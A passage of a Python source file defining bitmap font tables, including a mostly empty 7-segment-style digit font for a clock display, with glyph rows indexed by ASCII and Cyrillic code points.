[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA3 У
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA4 Ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA5 X
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA6 Ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA7 Ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA8 Ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA9 Щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAA Ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAB Ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAC Э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAD Ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAE Ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAF Я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB0 a
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB1 б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB2 в
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB3 г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB4 д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB5 e
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB6 ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB7 з
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB8 и
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB9 й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBA к
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBB л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBC м
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBD н
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBE o
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBF п
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xED
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFF
]
#: Bit patterns for the pilotClock Digits like 7-segments, font height = 10
DIGITS_FONT_SEG = [
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x00
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x01
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x02
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x03
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x04
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x05
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x06
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x07
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x08
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x09
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x10
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x11
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x12
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x13
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x14
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x15
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x16
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x17
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x18
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x19
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ' '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '!'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '"'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '#'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '$'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '%'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '&'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '''
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '('
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ')'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '*'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '+'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '-'
[0x0000, 0x0000, 0x0200, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '.'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '/'
[0x01EE, 0x0201, 0x0201, 0x0201, 0x0201, 0x01EE, 0x0000, 0x0000], # '0'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x01EE, 0x0000, 0x0000], # '1'
[0x01E0, 0x0211, 0x0211, 0x0211, 0x0211, 0x000E, 0x0000, 0x0000], # '2'
[0x0000, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '3'
[0x000E, 0x0010, 0x0010, 0x0010, 0x0010, 0x01EE, 0x0000, 0x0000], # '4'
[0x000E, 0x0211, 0x0211, 0x0211, 0x0211, 0x01E0, 0x0000, 0x0000], # '5'
[0x01EE, 0x0211, 0x0211, 0x0211, 0x0211, 0x01E0, 0x0000, 0x0000], # '6'
[0x0000, 0x0001, 0x0001, 0x0001, 0x0001, 0x01EE, 0x0000, 0x0000], # '7'
[0x01EE, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '8'
[0x000E, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '9'
[0x0000, 0x0000, 0x0084, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ':'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ';'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '<'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '='
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '>'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '?'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '@'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'A'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'B'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'C'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'D'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'E'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'F'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'G'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'H'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'I'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'J'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'K'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'L'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'M'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'N'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'O'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'P'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'R'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'S'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'T'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'U'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'V'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'W'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'X'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '['
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # backslash
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '^'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '_'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '`'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'a'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'b'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'c'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'd'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'e'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'f'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'g'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'h'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'i'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'j'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'k'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'l'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'm'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'n'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'o'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'p'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'r'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 's'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 't'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'u'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'v'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'w'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'x'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '{'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '|'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '}'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '~'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x7F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x80 p
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x81 c
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x82 т
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x83 у
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x84 ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x85 x
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x86 ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x87 ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x88 ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x89 щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8A ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8B ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8C ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8D э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8E ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8F я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x90 A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x91 Б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x92 В
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x93 Г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x94 Д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x95 E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x96 Ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x97 З
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x98 И
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x99 Й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9A K
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9B Л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9C M
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9D H
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9E O
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9F П
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA0 P
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA1 C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA2 T
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA3 У
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA4 Ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA5 X
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA6 Ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA7 Ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA8 Ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA9 Щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAA Ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAB Ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAC Э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAD Ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAE Ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAF Я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB0 a
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB1 б
